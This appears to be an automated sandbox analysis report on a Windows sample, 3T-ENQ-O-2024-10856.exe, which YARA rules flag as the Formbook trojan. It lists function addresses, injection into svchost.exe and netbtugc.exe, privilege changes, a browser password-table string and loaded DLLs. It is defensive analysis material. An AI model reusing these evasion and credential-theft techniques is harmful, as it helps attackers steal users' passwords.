            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B856302_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C095C32_2_03C095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB5BF02_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE1AA32_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD59102_2_03BD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD22_2_03B03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B03FD52_2_03B03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039703E65_2_039703E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038BE3F05_2_038BE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396A3525_2_0396A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039302C05_2_039302C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039502745_2_03950274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039641A25_2_039641A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039701AA5_2_039701AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039681CC5_2_039681CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038A01005_2_038A0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0394A1185_2_0394A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039381585_2_03938158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039420005_2_03942000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038AC7C05_2_038AC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038D47505_2_038D4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B07705_2_038B0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CC6E05_2_038CC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039705915_2_03970591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B05355_2_038B0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0395E4F65_2_0395E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039544205_2_03954420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039624465_2_03962446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03966BD75_2_03966BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396AB405_2_0396AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038AEA805_2_038AEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B29A05_2_038B29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0397A9A65_2_0397A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038C69625_2_038C6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038968B85_2_038968B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038DE8F05_2_038DE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038BA8405_2_038BA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B28405_2_038B2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0392EFA05_2_0392EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038A2FC85_2_038A2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038BCFE05_2_038BCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03952F305_2_03952F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038F2F285_2_038F2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038D0F305_2_038D0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03924F405_2_03924F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396CE935_2_0396CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038C2E905_2_038C2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396EEDB5_2_0396EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396EE265_2_0396EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B0E595_2_038B0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038C8DBF5_2_038C8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038AADE05_2_038AADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038BAD005_2_038BAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0394CD1F5_2_0394CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03950CB55_2_03950CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038A0CF25_2_038A0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B0C005_2_038B0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038F739A5_2_038F739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396132D5_2_0396132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0389D34C5_2_0389D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B52A05_2_038B52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CB2C05_2_038CB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039512ED5_2_039512ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038BB1B05_2_038BB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038E516C5_2_038E516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0389F1725_2_0389F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0397B16B5_2_0397B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B70C05_2_038B70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0395F0CC5_2_0395F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396F0E05_2_0396F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039670E95_2_039670E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396F7B05_2_0396F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039616CC5_2_039616CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038F56305_2_038F5630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0394D5B05_2_0394D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039795C35_2_039795C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_039675715_2_03967571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396F43F5_2_0396F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038A14605_2_038A1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CFB805_2_038CFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03925BF05_2_03925BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038EDBF95_2_038EDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FB765_2_0396FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038F5AA05_2_038F5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03951AA35_2_03951AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0394DAAC5_2_0394DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0395DAC65_2_0395DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03967A465_2_03967A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FA495_2_0396FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03923A6C5_2_03923A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B99505_2_038B9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CB9505_2_038CB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B38E05_2_038B38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0391D8005_2_0391D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B1F925_2_038B1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FFB15_2_0396FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03873FD55_2_03873FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03873FD25_2_03873FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FF095_2_0396FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B9EB05_2_038B9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038CFDC05_2_038CFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038B3D405_2_038B3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03961D5A5_2_03961D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03967D735_2_03967D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0396FCF25_2_0396FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03929C325_2_03929C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030118105_2_03011810
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300C7605_2_0300C760
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300AA005_2_0300AA00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0300C9805_2_0300C980
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03014EC05_2_03014EC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0301309B5_2_0301309B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_030130A05_2_030130A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0302B4205_2_0302B420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361E2E85_2_0361E2E8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361E7A85_2_0361E7A8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361E4035_2_0361E403
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0361D8085_2_0361D808
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0392F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 038F7E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0389B970 appears 279 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0391EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 038E5130 appears 50 times
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: String function: 00C7F885 appears 68 times
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: String function: 00C87750 appears 42 times
            Source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365761273.00000000042ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3T-ENQ-O-2024-10856.exe
            Source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363886940.0000000004143000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3T-ENQ-O-2024-10856.exe
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/4
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAD712 GetLastError,FormatMessageW,0_2_00CAD712
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9B8B0 AdjustTokenPrivileges,CloseHandle,0_2_00C9B8B0
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C9BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C9BEC3
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CAEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CAEA85
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CA6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00CA6F5B
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00CBC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00CBC604
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeCode function: 0_2_00C631F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C631F2
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeFile created: C:\Users\user\AppData\Local\Temp\autEA31.tmpJump to behavior
            Source: 3T-ENQ-O-2024-10856.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000005.00000003.2052849183.0000000003170000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2597976548.0000000003193000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2049766433.0000000003164000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2597976548.0000000003164000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 3T-ENQ-O-2024-10856.exeReversingLabs: Detection: 34%
            Source: unknownProcess created: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"Jump to behavior
            Source: C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
